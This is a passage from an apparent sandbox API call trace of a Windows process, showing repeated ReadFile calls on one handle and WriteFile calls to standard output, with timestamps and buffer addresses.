hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] GetFileType (hFile=0x4c) returned 0x1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.358] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.358] GetFileType (hFile=0x4c) returned 0x1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.359] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.359] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.359] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.359] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] GetFileType (hFile=0x4c) returned 0x1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] GetFileType (hFile=0x4c) returned 0x1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] GetFileType (hFile=0x4c) returned 0x1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] GetFileType (hFile=0x4c) returned 0x1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] GetFileType (hFile=0x4c) returned 0x1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] GetFileType (hFile=0x4c) returned 0x1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.359] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.359] GetFileType (hFile=0x4c) returned 0x1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] GetFileType (hFile=0x4c) returned 0x1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.360] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.360] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.360] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.360] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] GetFileType (hFile=0x4c) returned 0x1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] GetFileType (hFile=0x4c) returned 0x1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] GetFileType (hFile=0x4c) returned 0x1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] GetFileType (hFile=0x4c) returned 0x1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] GetFileType (hFile=0x4c) returned 0x1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.360] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.360] GetFileType (hFile=0x4c) returned 0x1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] GetFileType (hFile=0x4c) returned 0x1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] GetFileType (hFile=0x4c) returned 0x1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.361] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.361] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.361] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.361] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] GetFileType (hFile=0x4c) returned 0x1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] GetFileType (hFile=0x4c) returned 0x1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] GetFileType (hFile=0x4c) returned 0x1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.361] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.361] GetFileType (hFile=0x4c) returned 0x1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] GetFileType (hFile=0x4c) returned 0x1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] GetFileType (hFile=0x4c) returned 0x1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] GetFileType (hFile=0x4c) returned 0x1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] GetFileType (hFile=0x4c) returned 0x1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.362] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.362] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.362] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.362] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] GetFileType (hFile=0x4c) returned 0x1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] GetFileType (hFile=0x4c) returned 0x1 [0111.362] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.362] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] GetFileType (hFile=0x4c) returned 0x1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] GetFileType (hFile=0x4c) returned 0x1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] GetFileType (hFile=0x4c) returned 0x1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] GetFileType (hFile=0x4c) returned 0x1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] GetFileType (hFile=0x4c) returned 0x1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] GetFileType (hFile=0x4c) returned 0x1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.363] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.363] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.363] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.363] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.363] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.363] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] GetFileType (hFile=0x4c) returned 0x1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] GetFileType (hFile=0x4c) returned 0x1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] GetFileType (hFile=0x4c) returned 0x1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] GetFileType (hFile=0x4c) returned 0x1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] GetFileType (hFile=0x4c) returned 0x1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] GetFileType (hFile=0x4c) returned 0x1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] GetFileType (hFile=0x4c) returned 0x1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] GetFileType (hFile=0x4c) returned 0x1 [0111.364] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.364] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.365] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.365] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.365] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.365] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] GetFileType (hFile=0x4c) returned 0x1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] GetFileType (hFile=0x4c) returned 0x1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] GetFileType (hFile=0x4c) returned 0x1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] GetFileType (hFile=0x4c) returned 0x1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] GetFileType (hFile=0x4c) returned 0x1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] GetFileType (hFile=0x4c) returned 0x1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] GetFileType (hFile=0x4c) returned 0x1 [0111.365] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.365] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] GetFileType (hFile=0x4c) returned 0x1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.366] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.366] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.366] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.366] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesRead=0x26de34*=0x200, lpOverlapped=0x0) returned 1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] GetFileType (hFile=0x4c) returned 0x1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] GetFileType (hFile=0x4c) returned 0x1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec44*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec44*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] GetFileType (hFile=0x4c) returned 0x1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] WriteFile (in: hFile=0x4c, lpBuffer=0x26ec94*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ec94*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] GetFileType (hFile=0x4c) returned 0x1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] WriteFile (in: hFile=0x4c, lpBuffer=0x26ece4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ece4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] GetFileType (hFile=0x4c) returned 0x1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed34*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed34*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] GetFileType (hFile=0x4c) returned 0x1 [0111.366] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.366] WriteFile (in: hFile=0x4c, lpBuffer=0x26ed84*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ed84*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] GetFileType (hFile=0x4c) returned 0x1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] WriteFile (in: hFile=0x4c, lpBuffer=0x26edd4*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26edd4*, lpNumberOfBytesWritten=0x26de28*=0x50, lpOverlapped=0x0) returned 1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] GetFileType (hFile=0x4c) returned 0x1 [0111.367] _get_osfhandle (_FileHandle=1) returned 0x4c [0111.367] WriteFile (in: hFile=0x4c, lpBuffer=0x26ee24*, nNumberOfBytesToWrite=0x20, lpNumberOfBytesWritten=0x26de28, lpOverlapped=0x0 | out: lpBuffer=0x26ee24*, lpNumberOfBytesWritten=0x26de28*=0x20, lpOverlapped=0x0) returned 1 [0111.367] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.367] SetFilePointerEx (in: hFile=0x54, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x26de14 | out: lpNewFilePointer=0x0) returned 1 [0111.367] _get_osfhandle (_FileHandle=4) returned 0x54 [0111.367] ReadFile (in: hFile=0x54, lpBuffer=0x26ec44, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0x26de34, lpOverlapped=0x0 | out: 